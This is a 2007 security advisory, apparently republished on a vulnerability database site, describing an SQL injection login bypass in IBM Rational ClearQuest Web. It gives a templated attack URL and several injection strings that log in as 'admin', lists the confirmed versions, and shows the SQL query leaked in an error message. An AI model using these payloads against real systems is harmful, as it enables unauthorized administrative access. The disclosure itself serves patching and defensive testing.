Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17832
HistoryAug 17, 2007 - 12:00 a.m.

IBM Rational ClearQuest Web SQL Injection Login Bypass

2007-08-1700:00:00
vulners.com
95
JSON

+==============================================================+

  • IBM Rational ClearQuest Web Login Bypass (SQL Injection) +
    +==============================================================+

DISCOVERED BY:

SecureState
sasquatch - [email protected]
rel1k - [email protected]

HOMEPAGE:

www.securestate.com

AFFECTED AREA:

The username field on the login page is where the application is susceptible to SQL injection…

SAMPLE URL:

http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE

Log in as "admin":

' OR login_name LIKE '%admin%'–

(other variations work as well)
' OR login_name LIKE 'admin%'–
' OR LOWER(login_name) LIKE '%admin%'–
' OR LOWER(login_name) LIKE 'admin%'–
etc…use your imagination…

Confirmed against:

version 7.0.0.1 Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630

FULL SQL Statement is spit back in error message:

SELECT
master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
master_users
WHERE
login_name = 'INJECTION GOES HERE

JSON